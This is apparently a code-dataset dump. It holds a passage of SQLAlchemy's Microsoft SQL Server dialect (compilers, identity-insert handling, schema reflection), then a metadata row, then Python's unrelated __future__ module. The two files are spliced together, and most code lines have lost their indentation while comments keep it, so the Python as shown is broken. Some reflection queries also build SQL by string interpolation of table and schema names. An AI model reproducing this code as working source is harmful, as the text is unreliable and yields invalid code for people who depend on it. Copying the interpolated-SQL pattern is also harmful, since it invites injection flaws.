"""Activate IDENTITY_INSERT if needed."""
if self.isinsert:
tbl = self.compiled.statement.table
seq_column = tbl._autoincrement_column
insert_has_sequence = seq_column is not None
if insert_has_sequence:
self._enable_identity_insert = \
seq_column.key in self.compiled_parameters[0] or \
(
self.compiled.statement.parameters and (
(
self.compiled.statement._has_multi_parameters
and
seq_column.key in
self.compiled.statement.parameters[0]
) or (
not
self.compiled.statement._has_multi_parameters
and
seq_column.key in
self.compiled.statement.parameters
)
)
)
else:
self._enable_identity_insert = False
self._select_lastrowid = insert_has_sequence and \
not self.compiled.returning and \
not self._enable_identity_insert and \
not self.executemany
if self._enable_identity_insert:
self.root_connection._cursor_execute(
self.cursor,
self._opt_encode(
"SET IDENTITY_INSERT %s ON" %
self.dialect.identifier_preparer.format_table(tbl)),
(),
self)
def post_exec(self):
"""Disable IDENTITY_INSERT if enabled."""
conn = self.root_connection
if self._select_lastrowid:
if self.dialect.use_scope_identity:
conn._cursor_execute(
self.cursor,
"SELECT scope_identity() AS lastrowid", (), self)
else:
conn._cursor_execute(self.cursor,
"SELECT @@identity AS lastrowid",
(),
self)
# fetchall() ensures the cursor is consumed without closing it
row = self.cursor.fetchall()[0]
self._lastrowid = int(row[0])
if (self.isinsert or self.isupdate or self.isdelete) and \
self.compiled.returning:
self._result_proxy = engine.FullyBufferedResultProxy(self)
if self._enable_identity_insert:
conn._cursor_execute(
self.cursor,
self._opt_encode(
"SET IDENTITY_INSERT %s OFF" %
self.dialect.identifier_preparer. format_table(
self.compiled.statement.table)),
(),
self)
def get_lastrowid(self):
return self._lastrowid
def handle_dbapi_exception(self, e):
if self._enable_identity_insert:
try:
self.cursor.execute(
self._opt_encode(
"SET IDENTITY_INSERT %s OFF" %
self.dialect.identifier_preparer. format_table(
self.compiled.statement.table)))
except Exception:
pass
def get_result_proxy(self):
if self._result_proxy:
return self._result_proxy
else:
return engine.ResultProxy(self)
class MSSQLCompiler(compiler.SQLCompiler):
returning_precedes_values = True
extract_map = util.update_copy(
compiler.SQLCompiler.extract_map,
{
'doy': 'dayofyear',
'dow': 'weekday',
'milliseconds': 'millisecond',
'microseconds': 'microsecond'
})
def __init__(self, *args, **kwargs):
self.tablealiases = {}
super(MSSQLCompiler, self).__init__(*args, **kwargs)
def _with_legacy_schema_aliasing(fn):
def decorate(self, *arg, **kw):
if self.dialect.legacy_schema_aliasing:
return fn(self, *arg, **kw)
else:
super_ = getattr(super(MSSQLCompiler, self), fn.__name__)
return super_(*arg, **kw)
return decorate
def visit_now_func(self, fn, **kw):
return "CURRENT_TIMESTAMP"
def visit_current_date_func(self, fn, **kw):
return "GETDATE()"
def visit_length_func(self, fn, **kw):
return "LEN%s" % self.function_argspec(fn, **kw)
def visit_char_length_func(self, fn, **kw):
return "LEN%s" % self.function_argspec(fn, **kw)
def visit_concat_op_binary(self, binary, operator, **kw):
return "%s + %s" % \
(self.process(binary.left, **kw),
self.process(binary.right, **kw))
def visit_true(self, expr, **kw):
return '1'
def visit_false(self, expr, **kw):
return '0'
def visit_match_op_binary(self, binary, operator, **kw):
return "CONTAINS (%s, %s)" % (
self.process(binary.left, **kw),
self.process(binary.right, **kw))
def get_select_precolumns(self, select, **kw):
""" MS-SQL puts TOP, it's version of LIMIT here """
s = ""
if select._distinct:
s += "DISTINCT "
if select._simple_int_limit and not select._offset:
            # ODBC drivers (and possibly others) don't support bind params in
            # the SELECT clause on SQL Server, so we have to render a literal
            # value here.
s += "TOP %d " % select._limit
if s:
return s
else:
return compiler.SQLCompiler.get_select_precolumns(
self, select, **kw)
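    # Illustrative sketch (not part of the original source): with a simple
    # integer limit and no offset, e.g. select([t.c.x]).distinct().limit(10),
    # the precolumns render roughly as "SELECT DISTINCT TOP 10 ..."; the
    # trailing LIMIT clause itself is suppressed in limit_clause() below.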
def get_from_hint_text(self, table, text):
return text
def get_crud_hint_text(self, table, text):
return text
def limit_clause(self, select, **kw):
# Limit in mssql is after the select keyword
return ""
def visit_select(self, select, **kwargs):
"""Look for ``LIMIT`` and OFFSET in a select statement, and if
so tries to wrap it in a subquery with ``row_number()`` criterion.
"""
if (
(
not select._simple_int_limit and
select._limit_clause is not None
) or (
select._offset_clause is not None and
not select._simple_int_offset or select._offset
)
) and not getattr(select, '_mssql_visit', None):
# to use ROW_NUMBER(), an ORDER BY is required.
if not select._order_by_clause.clauses:
raise exc.CompileError('MSSQL requires an order_by when '
'using an OFFSET or a non-simple '
'LIMIT clause')
_order_by_clauses = [
sql_util.unwrap_label_reference(elem)
for elem in select._order_by_clause.clauses
]
limit_clause = select._limit_clause
offset_clause = select._offset_clause
kwargs['select_wraps_for'] = select
select = select._generate()
select._mssql_visit = True
select = select.column(
sql.func.ROW_NUMBER().over(order_by=_order_by_clauses)
.label("mssql_rn")).order_by(None).alias()
mssql_rn = sql.column('mssql_rn')
limitselect = sql.select([c for c in select.c if
c.key != 'mssql_rn'])
if offset_clause is not None:
limitselect.append_whereclause(mssql_rn > offset_clause)
if limit_clause is not None:
limitselect.append_whereclause(
mssql_rn <= (limit_clause + offset_clause))
else:
limitselect.append_whereclause(
mssql_rn <= (limit_clause))
return self.process(limitselect, **kwargs)
else:
return compiler.SQLCompiler.visit_select(self, select, **kwargs)
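    # Illustrative sketch (not part of the original source): for a statement
    # such as select([t.c.x]).order_by(t.c.x).limit(10).offset(5), the rewrite
    # above emits SQL along the lines of
    #
    #   SELECT anon_1.x FROM (
    #       SELECT t.x AS x, ROW_NUMBER() OVER (ORDER BY t.x) AS mssql_rn
    #       FROM t) AS anon_1
    #   WHERE mssql_rn > 5 AND mssql_rn <= 15
    #
    # The exact aliasing and parameter rendering depend on compiler settings.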
@_with_legacy_schema_aliasing
def visit_table(self, table, mssql_aliased=False, iscrud=False, **kwargs):
if mssql_aliased is table or iscrud:
return super(MSSQLCompiler, self).visit_table(table, **kwargs)
# alias schema-qualified tables
alias = self._schema_aliased_table(table)
if alias is not None:
return self.process(alias, mssql_aliased=table, **kwargs)
else:
return super(MSSQLCompiler, self).visit_table(table, **kwargs)
@_with_legacy_schema_aliasing
def visit_alias(self, alias, **kw):
# translate for schema-qualified table aliases
kw['mssql_aliased'] = alias.original
return super(MSSQLCompiler, self).visit_alias(alias, **kw)
@_with_legacy_schema_aliasing
def visit_column(self, column, add_to_result_map=None, **kw):
if column.table is not None and \
(not self.isupdate and not self.isdelete) or \
self.is_subquery():
# translate for schema-qualified table aliases
t = self._schema_aliased_table(column.table)
if t is not None:
converted = expression._corresponding_column_or_error(
t, column)
if add_to_result_map is not None:
add_to_result_map(
column.name,
column.name,
(column, column.name, column.key),
column.type
)
return super(MSSQLCompiler, self).\
visit_column(converted, **kw)
return super(MSSQLCompiler, self).visit_column(
column, add_to_result_map=add_to_result_map, **kw)
def _schema_aliased_table(self, table):
if getattr(table, 'schema', None) is not None:
if table not in self.tablealiases:
self.tablealiases[table] = table.alias()
return self.tablealiases[table]
else:
return None
def visit_extract(self, extract, **kw):
field = self.extract_map.get(extract.field, extract.field)
return 'DATEPART(%s, %s)' % \
(field, self.process(extract.expr, **kw))
def visit_savepoint(self, savepoint_stmt):
return "SAVE TRANSACTION %s" % \
self.preparer.format_savepoint(savepoint_stmt)
def visit_rollback_to_savepoint(self, savepoint_stmt):
return ("ROLLBACK TRANSACTION %s"
% self.preparer.format_savepoint(savepoint_stmt))
def visit_binary(self, binary, **kwargs):
"""Move bind parameters to the right-hand side of an operator, where
possible.
"""
if (
isinstance(binary.left, expression.BindParameter)
and binary.operator == operator.eq
and not isinstance(binary.right, expression.BindParameter)
):
return self.process(
expression.BinaryExpression(binary.right,
binary.left,
binary.operator),
**kwargs)
return super(MSSQLCompiler, self).visit_binary(binary, **kwargs)
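    # Illustrative sketch (not part of the original source): a comparison
    # written as bindparam('v') == t.c.x is re-emitted as t.c.x = :v, so the
    # bound value ends up on the right-hand side of the operator.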
def returning_clause(self, stmt, returning_cols):
if self.isinsert or self.isupdate:
target = stmt.table.alias("inserted")
else:
target = stmt.table.alias("deleted")
adapter = sql_util.ClauseAdapter(target)
columns = [
self._label_select_column(None, adapter.traverse(c),
True, False, {})
for c in expression._select_iterables(returning_cols)
]
return 'OUTPUT ' + ', '.join(columns)
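    # Illustrative sketch (not part of the original source): insert(t).returning(t.c.id)
    # renders roughly as "INSERT INTO t (...) OUTPUT inserted.id VALUES (...)";
    # DELETE statements use the "deleted" alias instead, and
    # returning_precedes_values places the OUTPUT clause before VALUES.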
def get_cte_preamble(self, recursive):
# SQL Server finds it too inconvenient to accept
# an entirely optional, SQL standard specified,
# "RECURSIVE" word with their "WITH",
# so here we go
return "WITH"
def label_select_column(self, select, column, asfrom):
if isinstance(column, expression.Function):
return column.label(None)
else:
return super(MSSQLCompiler, self).\
label_select_column(select, column, asfrom)
def for_update_clause(self, select):
# "FOR UPDATE" is only allowed on "DECLARE CURSOR" which
# SQLAlchemy doesn't use
return ''
def order_by_clause(self, select, **kw):
order_by = self.process(select._order_by_clause, **kw)
# MSSQL only allows ORDER BY in subqueries if there is a LIMIT
if order_by and (not self.is_subquery() or select._limit):
return " ORDER BY " + order_by
else:
return ""
def update_from_clause(self, update_stmt,
from_table, extra_froms,
from_hints,
**kw):
"""Render the UPDATE..FROM clause specific to MSSQL.
In MSSQL, if the UPDATE statement involves an alias of the table to
be updated, then the table itself must be added to the FROM list as
well. Otherwise, it is optional. Here, we add it regardless.
"""
return "FROM " + ', '.join(
t._compiler_dispatch(self, asfrom=True,
fromhints=from_hints, **kw)
for t in [from_table] + extra_froms)
class MSSQLStrictCompiler(MSSQLCompiler):
"""A subclass of MSSQLCompiler which disables the usage of bind
parameters where not allowed natively by MS-SQL.
A dialect may use this compiler on a platform where native
binds are used.
"""
ansi_bind_rules = True
def visit_in_op_binary(self, binary, operator, **kw):
kw['literal_binds'] = True
return "%s IN %s" % (
self.process(binary.left, **kw),
self.process(binary.right, **kw)
)
def visit_notin_op_binary(self, binary, operator, **kw):
kw['literal_binds'] = True
return "%s NOT IN %s" % (
self.process(binary.left, **kw),
self.process(binary.right, **kw)
)
def render_literal_value(self, value, type_):
"""
For date and datetime values, convert to a string
format acceptable to MSSQL. That seems to be the
so-called ODBC canonical date format which looks
like this:
yyyy-mm-dd hh:mi:ss.mmm(24h)
For other data types, call the base class implementation.
"""
# datetime and date are both subclasses of datetime.date
if issubclass(type(value), datetime.date):
# SQL Server wants single quotes around the date string.
return "'" + str(value) + "'"
else:
return super(MSSQLStrictCompiler, self).\
render_literal_value(value, type_)
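    # Illustrative sketch (not part of the original source): a Python
    # datetime.datetime(2012, 11, 10, 7, 37, 59) literal renders as
    # '2012-11-10 07:37:59' and datetime.date(2012, 11, 10) as '2012-11-10';
    # all other types fall through to the base class rendering.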
class MSDDLCompiler(compiler.DDLCompiler):
def get_column_specification(self, column, **kwargs):
colspec = (
self.preparer.format_column(column) + " "
+ self.dialect.type_compiler.process(
column.type, type_expression=column)
)
if column.nullable is not None:
if not column.nullable or column.primary_key or \
isinstance(column.default, sa_schema.Sequence):
colspec += " NOT NULL"
else:
colspec += " NULL"
if column.table is None:
raise exc.CompileError(
"mssql requires Table-bound columns "
"in order to generate DDL")
        # install an IDENTITY Sequence if we have either an explicit Sequence
        # or an implicit IDENTITY column
if isinstance(column.default, sa_schema.Sequence):
if column.default.start == 0:
start = 0
else:
start = column.default.start or 1
colspec += " IDENTITY(%s,%s)" % (start,
column.default.increment or 1)
elif column is column.table._autoincrement_column:
colspec += " IDENTITY(1,1)"
else:
default = self.get_column_default_string(column)
if default is not None:
colspec += " DEFAULT " + default
return colspec
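    # Illustrative sketch (not part of the original source): an Integer primary
    # key column "id" acting as the table's autoincrement column emits
    # "id INTEGER NOT NULL IDENTITY(1,1)", while a column defined with
    # Sequence('id_seq', start=100, increment=5) as its default emits
    # "id INTEGER NOT NULL IDENTITY(100,5)".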
def visit_create_index(self, create, include_schema=False):
index = create.element
self._verify_index_table(index)
preparer = self.preparer
text = "CREATE "
if index.unique:
text += "UNIQUE "
# handle clustering option
clustered = index.dialect_options['mssql']['clustered']
if clustered is not None:
if clustered:
text += "CLUSTERED "
else:
text += "NONCLUSTERED "
text += "INDEX %s ON %s (%s)" \
% (
self._prepared_index_name(index,
include_schema=include_schema),
preparer.format_table(index.table),
', '.join(
self.sql_compiler.process(expr,
include_table=False,
literal_binds=True) for
expr in index.expressions)
)
# handle other included columns
if index.dialect_options['mssql']['include']:
inclusions = [index.table.c[col]
if isinstance(col, util.string_types) else col
for col in
index.dialect_options['mssql']['include']
]
text += " INCLUDE (%s)" \
% ', '.join([preparer.quote(c.name)
for c in inclusions])
return text
def visit_drop_index(self, drop):
return "\nDROP INDEX %s ON %s" % (
self._prepared_index_name(drop.element, include_schema=False),
self.preparer.format_table(drop.element.table)
)
def visit_primary_key_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "PRIMARY KEY "
clustered = constraint.dialect_options['mssql']['clustered']
if clustered is not None:
if clustered:
text += "CLUSTERED "
else:
text += "NONCLUSTERED "
text += "(%s)" % ', '.join(self.preparer.quote(c.name)
for c in constraint)
text += self.define_constraint_deferrability(constraint)
return text
def visit_unique_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "UNIQUE "
clustered = constraint.dialect_options['mssql']['clustered']
if clustered is not None:
if clustered:
text += "CLUSTERED "
else:
text += "NONCLUSTERED "
text += "(%s)" % ', '.join(self.preparer.quote(c.name)
for c in constraint)
text += self.define_constraint_deferrability(constraint)
return text
class MSIdentifierPreparer(compiler.IdentifierPreparer):
reserved_words = RESERVED_WORDS
def __init__(self, dialect):
super(MSIdentifierPreparer, self).__init__(dialect, initial_quote='[',
final_quote=']')
def _escape_identifier(self, value):
return value
def quote_schema(self, schema, force=None):
"""Prepare a quoted table and schema name."""
result = '.'.join([self.quote(x, force) for x in schema.split('.')])
return result
def _db_plus_owner_listing(fn):
def wrap(dialect, connection, schema=None, **kw):
dbname, owner = _owner_plus_db(dialect, schema)
return _switch_db(dbname, connection, fn, dialect, connection,
dbname, owner, schema, **kw)
return update_wrapper(wrap, fn)
def _db_plus_owner(fn):
def wrap(dialect, connection, tablename, schema=None, **kw):
dbname, owner = _owner_plus_db(dialect, schema)
return _switch_db(dbname, connection, fn, dialect, connection,
tablename, dbname, owner, schema, **kw)
return update_wrapper(wrap, fn)
def _switch_db(dbname, connection, fn, *arg, **kw):
if dbname:
current_db = connection.scalar("select db_name()")
connection.execute("use %s" % dbname)
try:
return fn(*arg, **kw)
finally:
if dbname:
connection.execute("use %s" % current_db)
def _owner_plus_db(dialect, schema):
if not schema:
return None, dialect.default_schema_name
elif "." in schema:
return schema.split(".", 1)
else:
return None, schema
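# Illustrative sketch (not part of the original source): with the helpers above,
# a schema of "somedb.dbo" yields dbname="somedb" and owner="dbo", and
# _switch_db issues "use somedb" around the wrapped reflection call before
# switching back to the original database; a plain "dbo" schema leaves the
# current database untouched.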
class MSDialect(default.DefaultDialect):
name = 'mssql'
supports_default_values = True
supports_empty_insert = False
execution_ctx_cls = MSExecutionContext
use_scope_identity = True
max_identifier_length = 128
schema_name = "dbo"
colspecs = {
sqltypes.DateTime: _MSDateTime,
sqltypes.Date: _MSDate,
sqltypes.Time: TIME,
}
engine_config_types = default.DefaultDialect.engine_config_types.union([
('legacy_schema_aliasing', util.asbool),
])
ischema_names = ischema_names
supports_native_boolean = False
supports_unicode_binds = True
postfetch_lastrowid = True
server_version_info = ()
statement_compiler = MSSQLCompiler
ddl_compiler = MSDDLCompiler
type_compiler = MSTypeCompiler
preparer = MSIdentifierPreparer
construct_arguments = [
(sa_schema.PrimaryKeyConstraint, {
"clustered": None
}),
(sa_schema.UniqueConstraint, {
"clustered": None
}),
(sa_schema.Index, {
"clustered": None,
"include": None
})
]
def __init__(self,
query_timeout=None,
use_scope_identity=True,
max_identifier_length=None,
schema_name="dbo",
isolation_level=None,
deprecate_large_types=None,
legacy_schema_aliasing=False, **opts):
self.query_timeout = int(query_timeout or 0)
self.schema_name = schema_name
self.use_scope_identity = use_scope_identity
self.max_identifier_length = int(max_identifier_length or 0) or \
self.max_identifier_length
self.deprecate_large_types = deprecate_large_types
self.legacy_schema_aliasing = legacy_schema_aliasing
super(MSDialect, self).__init__(**opts)
self.isolation_level = isolation_level
def do_savepoint(self, connection, name):
# give the DBAPI a push
connection.execute("IF @@TRANCOUNT = 0 BEGIN TRANSACTION")
super(MSDialect, self).do_savepoint(connection, name)
def do_release_savepoint(self, connection, name):
# SQL Server does not support RELEASE SAVEPOINT
pass
_isolation_lookup = set(['SERIALIZABLE', 'READ UNCOMMITTED',
'READ COMMITTED', 'REPEATABLE READ',
'SNAPSHOT'])
def set_isolation_level(self, connection, level):
level = level.replace('_', ' ')
if level not in self._isolation_lookup:
raise exc.ArgumentError(
"Invalid value '%s' for isolation_level. "
"Valid isolation levels for %s are %s" %
(level, self.name, ", ".join(self._isolation_lookup))
)
cursor = connection.cursor()
cursor.execute(
"SET TRANSACTION ISOLATION LEVEL %s" % level)
cursor.close()
def get_isolation_level(self, connection):
cursor = connection.cursor()
cursor.execute("""
SELECT CASE transaction_isolation_level
WHEN 0 THEN NULL
WHEN 1 THEN 'READ UNCOMMITTED'
WHEN 2 THEN 'READ COMMITTED'
WHEN 3 THEN 'REPEATABLE READ'
WHEN 4 THEN 'SERIALIZABLE'
WHEN 5 THEN 'SNAPSHOT' END AS TRANSACTION_ISOLATION_LEVEL
FROM sys.dm_exec_sessions
where session_id = @@SPID
""")
val = cursor.fetchone()[0]
cursor.close()
return val.upper()
def initialize(self, connection):
super(MSDialect, self).initialize(connection)
self._setup_version_attributes()
def on_connect(self):
if self.isolation_level is not None:
def connect(conn):
self.set_isolation_level(conn, self.isolation_level)
return connect
else:
return None
def _setup_version_attributes(self):
if self.server_version_info[0] not in list(range(8, 17)):
# FreeTDS with version 4.2 seems to report here
# a number like "95.10.255". Don't know what
# that is. So emit warning.
# Use TDS Version 7.0 through 7.3, per the MS information here:
# https://msdn.microsoft.com/en-us/library/dd339982.aspx
# and FreeTDS information here (7.3 highest supported version):
# http://www.freetds.org/userguide/choosingtdsprotocol.htm
util.warn(
"Unrecognized server version info '%s'. Version specific "
"behaviors may not function properly. If using ODBC "
"with FreeTDS, ensure TDS_VERSION 7.0 through 7.3, not "
"4.2, is configured in the FreeTDS configuration." %
".".join(str(x) for x in self.server_version_info))
if self.server_version_info >= MS_2005_VERSION and \
'implicit_returning' not in self.__dict__:
self.implicit_returning = True
if self.server_version_info >= MS_2008_VERSION:
self.supports_multivalues_insert = True
if self.deprecate_large_types is None:
self.deprecate_large_types = \
self.server_version_info >= MS_2012_VERSION
def _get_default_schema_name(self, connection):
if self.server_version_info < MS_2005_VERSION:
return self.schema_name
query = sql.text("""
SELECT default_schema_name FROM
sys.database_principals
WHERE principal_id=database_principal_id()
""")
default_schema_name = connection.scalar(query)
if default_schema_name is not None:
return util.text_type(default_schema_name)
else:
return self.schema_name
@_db_plus_owner
def has_table(self, connection, tablename, dbname, owner, schema):
columns = ischema.columns
whereclause = columns.c.table_name == tablename
if owner:
whereclause = sql.and_(whereclause,
columns.c.table_schema == owner)
s = sql.select([columns], whereclause)
c = connection.execute(s)
return c.first() is not None
@reflection.cache
def get_schema_names(self, connection, **kw):
s = sql.select([ischema.schemata.c.schema_name],
order_by=[ischema.schemata.c.schema_name]
)
schema_names = [r[0] for r in connection.execute(s)]
return schema_names
@reflection.cache
@_db_plus_owner_listing
def get_table_names(self, connection, dbname, owner, schema, **kw):
tables = ischema.tables
s = sql.select([tables.c.table_name],
sql.and_(
tables.c.table_schema == owner,
tables.c.table_type == 'BASE TABLE'
),
order_by=[tables.c.table_name]
)
table_names = [r[0] for r in connection.execute(s)]
return table_names
@reflection.cache
@_db_plus_owner_listing
def get_view_names(self, connection, dbname, owner, schema, **kw):
tables = ischema.tables
s = sql.select([tables.c.table_name],
sql.and_(
tables.c.table_schema == owner,
tables.c.table_type == 'VIEW'
),
order_by=[tables.c.table_name]
)
view_names = [r[0] for r in connection.execute(s)]
return view_names
@reflection.cache
@_db_plus_owner
def get_indexes(self, connection, tablename, dbname, owner, schema, **kw):
        # index reflection here relies on the system catalogs, which are not
        # available below SQL Server 2005, so skip older versions
if self.server_version_info < MS_2005_VERSION:
return []
rp = connection.execute(
sql.text("select ind.index_id, ind.is_unique, ind.name "
"from sys.indexes as ind join sys.tables as tab on "
"ind.object_id=tab.object_id "
"join sys.schemas as sch on sch.schema_id=tab.schema_id "
"where tab.name = :tabname "
"and sch.name=:schname "
"and ind.is_primary_key=0",
bindparams=[
sql.bindparam('tabname', tablename,
sqltypes.String(convert_unicode=True)),
sql.bindparam('schname', owner,
sqltypes.String(convert_unicode=True))
],
typemap={
'name': sqltypes.Unicode()
}
)
)
indexes = {}
for row in rp:
indexes[row['index_id']] = {
'name': row['name'],
'unique': row['is_unique'] == 1,
'column_names': []
}
rp = connection.execute(
sql.text(
"select ind_col.index_id, ind_col.object_id, col.name "
"from sys.columns as col "
"join sys.tables as tab on tab.object_id=col.object_id "
"join sys.index_columns as ind_col on "
"(ind_col.column_id=col.column_id and "
"ind_col.object_id=tab.object_id) "
"join sys.schemas as sch on sch.schema_id=tab.schema_id "
"where tab.name=:tabname "
"and sch.name=:schname",
bindparams=[
sql.bindparam('tabname', tablename,
sqltypes.String(convert_unicode=True)),
sql.bindparam('schname', owner,
sqltypes.String(convert_unicode=True))
],
typemap={'name': sqltypes.Unicode()}
),
)
for row in rp:
if row['index_id'] in indexes:
indexes[row['index_id']]['column_names'].append(row['name'])
return list(indexes.values())
@reflection.cache
@_db_plus_owner
def get_view_definition(self, connection, viewname,
dbname, owner, schema, **kw):
rp = connection.execute(
sql.text(
"select definition from sys.sql_modules as mod, "
"sys.views as views, "
"sys.schemas as sch"
" where "
"mod.object_id=views.object_id and "
"views.schema_id=sch.schema_id and "
"views.name=:viewname and sch.name=:schname",
bindparams=[
sql.bindparam('viewname', viewname,
sqltypes.String(convert_unicode=True)),
sql.bindparam('schname', owner,
sqltypes.String(convert_unicode=True))
]
)
)
if rp:
view_def = rp.scalar()
return view_def
@reflection.cache
@_db_plus_owner
def get_columns(self, connection, tablename, dbname, owner, schema, **kw):
# Get base columns
columns = ischema.columns
if owner:
whereclause = sql.and_(columns.c.table_name == tablename,
columns.c.table_schema == owner)
else:
whereclause = columns.c.table_name == tablename
s = sql.select([columns], whereclause,
order_by=[columns.c.ordinal_position])
c = connection.execute(s)
cols = []
while True:
row = c.fetchone()
if row is None:
break
(name, type, nullable, charlen,
numericprec, numericscale, default, collation) = (
row[columns.c.column_name],
row[columns.c.data_type],
row[columns.c.is_nullable] == 'YES',
row[columns.c.character_maximum_length],
row[columns.c.numeric_precision],
row[columns.c.numeric_scale],
row[columns.c.column_default],
row[columns.c.collation_name]
)
coltype = self.ischema_names.get(type, None)
kwargs = {}
if coltype in (MSString, MSChar, MSNVarchar, MSNChar, MSText,
MSNText, MSBinary, MSVarBinary,
sqltypes.LargeBinary):
if charlen == -1:
charlen = None
kwargs['length'] = charlen
if collation:
kwargs['collation'] = collation
if coltype is None:
util.warn(
"Did not recognize type '%s' of column '%s'" %
(type, name))
coltype = sqltypes.NULLTYPE
else:
if issubclass(coltype, sqltypes.Numeric) and \
coltype is not MSReal:
kwargs['scale'] = numericscale
kwargs['precision'] = numericprec
coltype = coltype(**kwargs)
cdict = {
'name': name,
'type': coltype,
'nullable': nullable,
'default': default,
'autoincrement': False,
}
cols.append(cdict)
# autoincrement and identity
colmap = {}
for col in cols:
colmap[col['name']] = col
# We also run an sp_columns to check for identity columns:
cursor = connection.execute("sp_columns @table_name = '%s', "
"@table_owner = '%s'"
% (tablename, owner))
ic = None
while True:
row = cursor.fetchone()
if row is None:
break
(col_name, type_name) = row[3], row[5]
if type_name.endswith("identity") and col_name in colmap:
ic = col_name
colmap[col_name]['autoincrement'] = True
colmap[col_name]['sequence'] = dict(
name='%s_identity' % col_name)
break
cursor.close()
if ic is not None and self.server_version_info >= MS_2005_VERSION:
table_fullname = "%s.%s" % (owner, tablename)
cursor = connection.execute(
"select ident_seed('%s'), ident_incr('%s')"
% (table_fullname, table_fullname)
)
row = cursor.first()
if row is not None and row[0] is not None:
colmap[ic]['sequence'].update({
'start': int(row[0]),
'increment': int(row[1])
})
return cols
@reflection.cache
@_db_plus_owner
def get_pk_constraint(self, connection, tablename,
dbname, owner, schema, **kw):
pkeys = []
TC = ischema.constraints
C = ischema.key_constraints.alias('C')
# Primary key constraints
s = sql.select([C.c.column_name,
TC.c.constraint_type,
C.c.constraint_name],
sql.and_(TC.c.constraint_name == C.c.constraint_name,
TC.c.table_schema == C.c.table_schema,
C.c.table_name == tablename,
C.c.table_schema == owner)
)
c = connection.execute(s)
constraint_name = None
for row in c:
if 'PRIMARY' in row[TC.c.constraint_type.name]:
pkeys.append(row[0])
if constraint_name is None:
constraint_name = row[C.c.constraint_name.name]
return {'constrained_columns': pkeys, 'name': constraint_name}
@reflection.cache
@_db_plus_owner
def get_foreign_keys(self, connection, tablename,
dbname, owner, schema, **kw):
RR = ischema.ref_constraints
C = ischema.key_constraints.alias('C')
R = ischema.key_constraints.alias('R')
# Foreign key constraints
s = sql.select([C.c.column_name,
R.c.table_schema, R.c.table_name, R.c.column_name,
RR.c.constraint_name, RR.c.match_option,
RR.c.update_rule,
RR.c.delete_rule],
sql.and_(C.c.table_name == tablename,
C.c.table_schema == owner,
C.c.constraint_name == RR.c.constraint_name,
R.c.constraint_name ==
RR.c.unique_constraint_name,
C.c.ordinal_position == R.c.ordinal_position
),
order_by=[RR.c.constraint_name, R.c.ordinal_position]
)
# group rows by constraint ID, to handle multi-column FKs
fkeys = []
fknm, scols, rcols = (None, [], [])
def fkey_rec():
return {
'name': None,
'constrained_columns': [],
'referred_schema': None,
'referred_table': None,
'referred_columns': []
}
fkeys = util.defaultdict(fkey_rec)
for r in connection.execute(s).fetchall():
scol, rschema, rtbl, rcol, rfknm, fkmatch, fkuprule, fkdelrule = r
rec = fkeys[rfknm]
rec['name'] = rfknm
if not rec['referred_table']:
rec['referred_table'] = rtbl
if schema is not None or owner != rschema:
if dbname:
rschema = dbname + "." + rschema
rec['referred_schema'] = rschema
local_cols, remote_cols = \
rec['constrained_columns'],\
rec['referred_columns']
local_cols.append(scol)
remote_cols.append(rcol)
return list(fkeys.values())
| mit |
ivan-fedorov/intellij-community | python/lib/Lib/__future__.py | 91 | 3906 | """Record of phased-in incompatible language changes.
Each line is of the form:
FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ","
CompilerFlag ")"
where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples
of the same form as sys.version_info:
(PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int
PY_MINOR_VERSION, # the 1; an int
PY_MICRO_VERSION, # the 0; an int
PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string
PY_RELEASE_SERIAL # the 3; an int
)
OptionalRelease records the first release in which
from __future__ import FeatureName
was accepted.
In the case of MandatoryReleases that have not yet occurred,
MandatoryRelease predicts the release in which the feature will become part
of the language.
Else MandatoryRelease records when the feature became part of the language;
in releases at or after that, modules no longer need
from __future__ import FeatureName
to use the feature in question, but may continue to use such imports.
MandatoryRelease may also be None, meaning that a planned feature got
dropped.
Instances of class _Feature have two corresponding methods,
.getOptionalRelease() and .getMandatoryRelease().
CompilerFlag is the (bitfield) flag that should be passed in the fourth
argument to the builtin function compile() to enable the feature in
dynamically compiled code. This flag is stored in the .compiler_flag
attribute on _Feature instances. These values must match the appropriate
#defines of CO_xxx flags in Include/compile.h.
No feature line is ever to be deleted from this file.
"""
all_feature_names = [
"nested_scopes",
"generators",
"division",
"absolute_import",
"with_statement",
]
__all__ = ["all_feature_names"] + all_feature_names
# The CO_xxx symbols are defined here under the same names used by
# compile.h, so that an editor search will find them here. However,
# they're not exported in __all__, because they don't really belong to
# this module.
CO_NESTED = 0x0010 # nested_scopes
CO_GENERATOR_ALLOWED = 0 # generators (obsolete, was 0x1000)
CO_FUTURE_DIVISION = 0x2000 # division
CO_FUTURE_ABSOLUTE_IMPORT = 0x4000 # perform absolute imports by default
CO_FUTURE_WITH_STATEMENT = 0x8000 # with statement
class _Feature:
def __init__(self, optionalRelease, mandatoryRelease, compiler_flag):
self.optional = optionalRelease
self.mandatory = mandatoryRelease
self.compiler_flag = compiler_flag
def getOptionalRelease(self):
"""Return first release in which this feature was recognized.
This is a 5-tuple, of the same form as sys.version_info.
"""
return self.optional
def getMandatoryRelease(self):
"""Return release in which this feature will become mandatory.
This is a 5-tuple, of the same form as sys.version_info, or, if
the feature was dropped, is None.
"""
return self.mandatory
def __repr__(self):
return "_Feature" + repr((self.optional,
self.mandatory,
self.compiler_flag))
nested_scopes = _Feature((2, 1, 0, "beta", 1),
(2, 2, 0, "alpha", 0),
CO_NESTED)
generators = _Feature((2, 2, 0, "alpha", 1),
(2, 3, 0, "final", 0),
CO_GENERATOR_ALLOWED)
division = _Feature((2, 2, 0, "alpha", 2),
(3, 0, 0, "alpha", 0),
CO_FUTURE_DIVISION)
absolute_import = _Feature((2, 5, 0, "alpha", 1),
(2, 7, 0, "alpha", 0),
CO_FUTURE_ABSOLUTE_IMPORT)
with_statement = _Feature((2, 5, 0, "alpha", 1),
(2, 6, 0, "alpha", 0),
CO_FUTURE_WITH_STATEMENT)
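# A minimal usage sketch (not part of this module): a feature's compiler_flag
# can be passed as the fourth argument to the builtin compile() to enable the
# feature in dynamically compiled code, for example:
#
#     import __future__
#     code = compile("result = 1 / 2", "<string>", "exec",
#                    __future__.division.compiler_flag)
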